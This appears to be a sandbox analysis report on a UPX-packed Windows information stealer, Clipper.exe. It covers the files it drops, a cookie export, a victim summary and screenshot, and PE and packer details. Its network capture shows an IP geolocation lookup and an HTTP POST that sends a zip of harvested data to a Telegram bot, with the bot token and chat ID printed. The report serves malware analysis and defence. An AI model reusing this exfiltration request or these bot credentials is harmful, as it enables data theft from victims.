Entropy (8bit): 0.8746135976761988
Encrypted: false
SSDEEP: 96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5: 9E68EA772705B5EC0C83C2A97BB26324
SHA1: 243128040256A9112CEAC269D56AD6B21061FF80
SHA-256: 17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512: 312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious: false
Reputation: high, very likely benign file
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Clipper.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Clipper.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 286
Entropy (8bit): 5.7588025104123
Encrypted: false
SSDEEP: 6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
MD5: 07691E9F2983932701060D0FC5588075
SHA1: 878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
SHA-256: 7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
SHA-512: 399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
Malicious: false
Preview: .google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
Note: the preview is tab-separated Netscape cookies.txt layout (domain, include-subdomains flag, path, secure flag, expiry, name, value), one cookie per line. It is the stealer's export of the two google.com cookies (1P_JAR and NID) found on the analysis host, which matches the "Cookies: 2" tally in the summary text file dropped by the same process.
Process: C:\Users\user\Desktop\Clipper.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 944659
Entropy (8bit): 7.578636315011459
Encrypted: false
SSDEEP: 24576:sTAcuVvwM6Rb0f36VY/DUYzcMevNTm3u2:rcQxUYevw
MD5: 4438231671D9C1E35020BB2C9C030F21
SHA1: 0E9A15C025367AEEA20E96C45622787CFAA9A569
SHA-256: E5C3BD157A8F424A520ED5A474957A6A3FBC0D76B8D8573E1218BC66CE70589C
SHA-512: D1E3D139585D26304FA2B0AFF01209822F3FD9CE1CEAF4988EC5A2364FEBF56182E3C22CBABF01EFF318CE6569E99484452C884BC0DEDE1D2FA40581D2BC1D42
Malicious: false
                      Preview:.PNG........IHDR................C..i.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..
Process: C:\Users\user\Desktop\Clipper.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 29958
Entropy (8bit): 7.847962777481426
Encrypted: false
SSDEEP: 384:7kihfuJ0cy3yc7K7I6b6g6T2AnMhpNzkihfuJ0cy3yc7K7I6b6g6T2AnMhpNBLv:7kiluJ3AJoRe2AakiluJ3AJoRe2Asz
MD5: BC1E38DCD39A7C76EE718F608FBD0246
SHA1: A1371A4A19805ABFD2347C8845124F77AA868122
SHA-256: 74D757A1F600895217FAE7ACE213AA4C4FBD303D7BA0BCDD97942C949734DD87
SHA-512: 0B416189075327DA46B745A5BE25A27E4DFD0BD4F3B66893C02280CA516D8CD5E092E02C29D7DE37997A62CFC0B4280FE53B666AF3932B2359DE37F512554F98
Malicious: false
                      Preview:PK...........X...s............BJZFPPWAPT.png..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........Xm?..............CZQKSDDMWR.png..I.E!.E......"._.wH4...#.......V......,.c5..M{.6..HR.^3..u.F....OU...VX.B..k...S...@45.R.....1n.r.+...Hr.fu...X?.`ps.....o....C,......'.......r.*.>......k......S)pr.0'..x.N]..o;..=.....9^:.....M.t%..g._.f=...w.=0.......b.H....(...3...r....m..Z.
Process: C:\Users\user\Desktop\Clipper.exe
File Type: Unicode text, UTF-8 text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 666
Entropy (8bit): 5.337860128589585
Encrypted: false
SSDEEP: 12:eM36nIQN3eyQ8bjx6YjrJFQ+lQM7NlVaVIBQM3aWfgyIHdAMij01+ajXaBLF:exVNbxxVJ+XM7NlVaVIe8dOAMijUlqBh
MD5: 79EF9DAF9552353BD91D145D497A24EA
SHA1: C965019D9402A467FE7AA00EC6AF3D5840A05364
SHA-256: 9502B38F7A930D69C2662BD23B89E37C669680A056E1E926B08AA5A755B600EE
SHA-512: B99C7187C0AEEC39218FD58456A969F0CE225F1E50044CA5839E1777E8BB9321671F80DE99271E7073BF7B4B88600FCAF60063C19A4A6D92B5CBB187FC6A2DEF
Malicious: false
Preview: ..- IP Info -....IP: 173.254.250.91..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - 9U6K4TPK4 (1280, 1024)..HWID: 8938522624742244..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Clipper.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 40...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..
Note: this is the stealer's own summary of the victim host, written before exfiltration: the public IP and geolocation of the sandbox's egress address, OS, CPU, display adapter and resolution, a hardware ID, the sample's path, whether it runs elevated, the installed antivirus, and tallies of what was harvested (2 cookies and 40 files here; Passwords, Wallets, Credit Cards, FTP/SSH and Discord entries are empty on this analysis host). The "(1280, 1024)" resolution matches the 1280 x 1024 PNG screenshot dropped by the same process. "Malicious: false" refers to the file's own content, not to its origin.
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Note: this is the probe script PowerShell itself writes at startup to test whether script execution is constrained by AppLocker; it is a benign side effect of the powershell.exe child process, not something the sample wrote.
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Users\user\Desktop\Clipper.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 978501
Entropy (8bit): 7.599338590095629
Encrypted: false
SSDEEP: 24576:jTAcuVvwM6Rb0f36VY/DUYzcMevNTm3uy:icQxUYevs
MD5: 7B2059F739E11BB1BDD18580B40CAEAE
SHA1: 47F7318E5376138615E347F540DE6CB27849B36D
SHA-256: 4CFAB6840969BD81C8C55E473FDB47CAB916364890A187C6D887D3B3EE6557B5
SHA-512: 1C39A5D928FD28C74FCCFFB3C0827DDDB07FFEB336AAC3E8F3C09691A48FD945B59AFF6CE3C9361A76D8B2DB26691BB999D9E61D0EE02CEAA3EF939B52F6377C
Malicious: false
Preview: PK...........X................Autofill/PK...........X................Cookies/PK...........X................CreditCards/PK...........X................Downloads/PK...........X................History/PK...........X................Passwords/PK...........X.Y./.j...j......screen1.png.PNG........IHDR................C..i.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
Note: this store-compressed archive is the exfiltration bundle. The local file headers visible in the preview are the stealer's category directories (Autofill/, Cookies/, CreditCards/, Downloads/, History/, Passwords/) followed by screen1.png, whose leading bytes are identical to the dropped 1280 x 1024 PNG above; the near-identical SSDEEP of the two files reflects that the screenshot is stored uncompressed inside the zip.
Process: C:\Users\user\Desktop\Clipper.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 29958
Entropy (8bit): 7.847962777481426
Encrypted: false
SSDEEP: 384:7kihfuJ0cy3yc7K7I6b6g6T2AnMhpNzkihfuJ0cy3yc7K7I6b6g6T2AnMhpNBLv:7kiluJ3AJoRe2AakiluJ3AJoRe2Asz
MD5: BC1E38DCD39A7C76EE718F608FBD0246
SHA1: A1371A4A19805ABFD2347C8845124F77AA868122
SHA-256: 74D757A1F600895217FAE7ACE213AA4C4FBD303D7BA0BCDD97942C949734DD87
SHA-512: 0B416189075327DA46B745A5BE25A27E4DFD0BD4F3B66893C02280CA516D8CD5E092E02C29D7DE37997A62CFC0B4280FE53B666AF3932B2359DE37F512554F98
Malicious: false
                      Preview:PK...........X...s............BJZFPPWAPT.png..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK...........Xm?..............CZQKSDDMWR.png..I.E!.E......"._.wH4...#.......V......,.c5..M{.6..HR.^3..u.F....OU...VX.B..k...S...@45.R.....1n.r.+...Hr.fu...X?.`ps.....o....C,......'.......r.*.>......k......S)pr.0'..x.N]..o;..=.....9^:.....M.t%..g._.f=...w.=0.......b.H....(...3...r....m..Z.
Process: C:\Users\user\Desktop\Clipper.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.017262956703125623
Encrypted: false
SSDEEP: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5: B7C14EC6110FA820CA6B65F5AEC85911
SHA1: 608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256: FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512: D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious: false
                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.946315824097804
TrID:
• Win64 Executable GUI (202006/5) 81.26%
• UPX compressed Win32 Executable (30571/9) 12.30%
• Win64 Executable (generic) (12005/4) 4.83%
• Generic Win/DOS Executable (2004/3) 0.81%
• DOS Executable Generic (2002/1) 0.81%
File name: Clipper.exe
File size: 2'269'184 bytes
MD5: a0a3146b324c02ed258e040e035bcec2
SHA1: 4635d5ddba61b0e4ab04549b28c854f4193de364
SHA256: d6fa02a17eb8e18ae484e4af8462eb4362b1ab883e48a6a5c03c265dd867bf6f
SHA512: 6770b6514e39b57a187188cb5ce7a44ddb8e0d36ed74f4ea3f5b544bd4f81354a0ca73c25141b528c8d707ee296971ca5e50931b5a239e056034fa36c02a13cb
SSDEEP: 49152:l9BTMxaCRVQw6N9zcEvIp2azx+au9O5VT4PUY3c0i:l9maCRVYBcE48s5d
TLSH: 6EB533AD590761F1D9EDA0FFF8232D8B65DC8B3BE9C2D159CC90D60D64B04B08C8D96A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140545f00
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x664FF26D [Fri May 24 01:50:37 2024 UTC]
TLS Callbacks: 0x405461a5, 0x1
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: e8effc9201cf1e60acc68af88aec3bd3
Note: the whole-file entropy of 7.95, the TrID match for UPX, the UPX0/UPX1/UPX2 section names and an entrypoint that lies in UPX1 rather than the first section all say the same thing: this is a UPX-packed PE32+. The entrypoint disassembly, import table and import hash below therefore describe the UPX stub, not the stealer itself; static analysis of the real program needs the unpacked image (upx -d if the packer is unmodified, otherwise a memory dump after the stub finishes).
Instruction
Note on reading this listing: the sandbox decoded the PE32+ entrypoint in 32-bit mode, so every `dec eax` in front of a lea/sub/add/cmp/or/inc is the byte 0x48, which in 64-bit mode is a REX.W prefix rather than an instruction. Read as x64 code, the four single-byte pushes at 0x140545f00 (push rbx/rsi/rdi/rbp) are followed at RVA 0x545f04 by the 7-byte RIP-relative `lea rsi, [rip-0x228F0B]` (the 0xFFDD70F5 shown is that displacement); with the next instruction at RVA 0x545f0b this gives rsi = RVA 0x31d000, the start of UPX1 (the compressed payload), and `lea rdi, [rsi-0x31C000]` then gives rdi = RVA 0x1000, the start of UPX0, the empty writable and executable section the payload is decompressed into. The repeated `add ebx, ebx / mov ebx, [esi] / adc ebx, ebx` sequences are the bit-stream reader of the UPX decompressor; nothing of the actual program is visible until it has been unpacked.
                      push ebx
                      push esi
                      push edi
                      push ebp
                      dec eax
                      lea esi, dword ptr [FFDD70F5h]
                      dec eax
                      lea edi, dword ptr [esi-0031C000h]
                      dec eax
                      lea eax, dword ptr [edi+0051E7B8h]
                      push dword ptr [eax]
                      mov dword ptr [eax], D25B285Ah
                      push eax
                      push edi
                      xor ebx, ebx
                      xor ecx, ecx
                      dec eax
                      or ebp, FFFFFFFFh
                      call 00007F7A54754D65h
                      add ebx, ebx
                      je 00007F7A54754D14h
                      rep ret
                      mov ebx, dword ptr [esi]
                      dec eax
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      mov dl, byte ptr [esi]
                      rep ret
                      dec eax
                      lea eax, dword ptr [edi+ebp]
                      cmp ecx, 05h
                      mov dl, byte ptr [eax]
                      jbe 00007F7A54754D33h
                      dec eax
                      cmp ebp, FFFFFFFCh
                      jnbe 00007F7A54754D2Dh
                      sub ecx, 04h
                      mov edx, dword ptr [eax]
                      dec eax
                      add eax, 04h
                      sub ecx, 04h
                      mov dword ptr [edi], edx
                      dec eax
                      lea edi, dword ptr [edi+04h]
                      jnc 00007F7A54754D01h
                      add ecx, 04h
                      mov dl, byte ptr [eax]
                      je 00007F7A54754D22h
                      dec eax
                      inc eax
                      mov byte ptr [edi], dl
                      sub ecx, 01h
                      mov dl, byte ptr [eax]
                      dec eax
                      lea edi, dword ptr [edi+01h]
                      jne 00007F7A54754D02h
                      rep ret
                      cld
                      inc ecx
                      pop ebx
                      jmp 00007F7A54754D1Ah
                      dec eax
                      inc esi
                      mov byte ptr [edi], dl
                      dec eax
                      inc edi
                      mov dl, byte ptr [esi]
                      add ebx, ebx
                      jne 00007F7A54754D1Ch
                      mov ebx, dword ptr [esi]
                      dec eax
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      mov dl, byte ptr [esi]
                      jc 00007F7A54754CF8h
                      lea eax, dword ptr [ecx+01h]
                      jmp 00007F7A54754D19h
                      dec eax
                      inc ecx
                      call ebx
                      adc eax, eax
                      inc ecx
                      call ebx
                      adc eax, eax
                      add ebx, ebx
                      jne 00007F7A54754D1Ch
                      mov ebx, dword ptr [esi]
                      dec eax
                      sub esi, FFFFFFFCh
                      adc ebx, ebx
                      mov dl, byte ptr [esi]
                      jnc 00007F7A54754CF6h
                      sub eax, 03h
                      jc 00007F7A54754D2Bh
                      shl eax, 08h
                      Programming Language:
                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x547000 | 0x5b4 | UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x520000 | 0x14850 | UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5475b4 | 0x24 | UPX2
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x5461d0 | 0x28 | UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5463c0 | 0x140 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      UPX0 | 0x1000 | 0x31c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      UPX1 | 0x31d000 | 0x22a000 | 0x229600 | 61142e098e553c86dde20169c4077b75 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      UPX2 | 0x547000 | 0x1000 | 0x600 | 26109ef07c8e9de0ec4d5d7876e18dec | False | 0.3841145833333333 | data | 3.8874308360620655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLL | Import
                      advapi32.dll | FreeSid
                      api-ms-win-crt-heap-l1-1-0.dll | free
                      api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                      api-ms-win-crt-math-l1-1-0.dll | log
                      api-ms-win-crt-runtime-l1-1-0.dll | exit
                      api-ms-win-crt-stdio-l1-1-0.dll | _set_fmode
                      api-ms-win-crt-string-l1-1-0.dll | strlen
                      api-ms-win-crt-time-l1-1-0.dll | _localtime64_s
                      api-ms-win-crt-utility-l1-1-0.dll | qsort
                      bcrypt.dll | BCryptGenRandom
                      crypt32.dll | CertOpenStore
                      gdi32.dll | DeleteDC
                      KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                      ntdll.dll | RtlUnwindEx
                      ole32.dll | CoInitializeEx
                      oleaut32.dll | VariantClear
                      rstrtmgr.dll | RmGetList
                      secur32.dll | DecryptMessage
                      user32.dll | GetMonitorInfoW
                      ws2_32.dll | bind
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jun 1, 2024 18:46:44.516002893 CEST | 50173 | 53 | 192.168.2.5 | 1.1.1.1
                      Jun 1, 2024 18:46:44.524559975 CEST | 53 | 50173 | 1.1.1.1 | 192.168.2.5
                      Jun 1, 2024 18:46:57.310457945 CEST | 58685 | 53 | 192.168.2.5 | 1.1.1.1
                      Jun 1, 2024 18:46:57.317370892 CEST | 53 | 58685 | 1.1.1.1 | 192.168.2.5
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jun 1, 2024 18:46:44.516002893 CEST | 192.168.2.5 | 1.1.1.1 | 0x4a57 | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
                      Jun 1, 2024 18:46:57.310457945 CEST | 192.168.2.5 | 1.1.1.1 | 0xeca3 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jun 1, 2024 18:46:44.524559975 CEST | 1.1.1.1 | 192.168.2.5 | 0x4a57 | No error (0) | ipwho.is | | 195.201.57.90 | A (IP address) | IN (0x0001) | false
                      Jun 1, 2024 18:46:57.317370892 CEST | 1.1.1.1 | 192.168.2.5 | 0xeca3 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                      • api.telegram.org
                      • ipwho.is
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 49704 | 195.201.57.90 | 80 | 5444 | C:\Users\user\Desktop\Clipper.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jun 1, 2024 18:46:44.534746885 CEST | 59 | OUT | GET /?output=json HTTP/1.1
                      accept: */*
                      host: ipwho.is
                      Jun 1, 2024 18:46:45.363785028 CEST | 941 | IN | HTTP/1.1 200 OK
                      Date: Sat, 01 Jun 2024 16:46:45 GMT
                      Content-Type: application/json; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Server: ipwhois
                      Access-Control-Allow-Headers: *
                      X-Robots-Tag: noindex
                      Data Ascii: 2bd{"ip":"173.254.250.91","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"QuadraNet, Inc","isp":"Quadranet Enterprises LLC","domain":""},"timezone":{"id":"America\/Chicago","abbr":"CDT","is_dst":true,"offset":-18000,"utc":"-05:00","current_time":"2024-06-01T11:46:45-05:00"}}0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 49705 | 149.154.167.220 | 443 | 5444 | C:\Users\user\Desktop\Clipper.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-06-01 16:46:58 UTC | 1187 | OUT | POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%209U6K4TPK4%20(1280,%201024)%0AHWID:%208938522624742244%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Clipper.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                      content-type: multipart/form-data; boundary=06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4
                      content-length: 978765
                      accept: */*
                      host: api.telegram.org
                      2024-06-01 16:46:58 UTC | 15197 | OUT
                      Data Ascii:
                      --06ec5f61112c6801-34e39273c27dba2c-829713dddb1cab64-cc80a85d9fadfaa4
                      Content-Disposition: form-data; name="document"; filename="[US]_173.254.250.91.zip"
                      Content-Type: application/zip
                      PKXAutofill/PKX
                      2024-06-01 16:46:59 UTC | 389 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0
                      Date: Sat, 01 Jun 2024 16:46:59 GMT
                      Content-Type: application/json
                      Content-Length: 1272
                      Connection: close
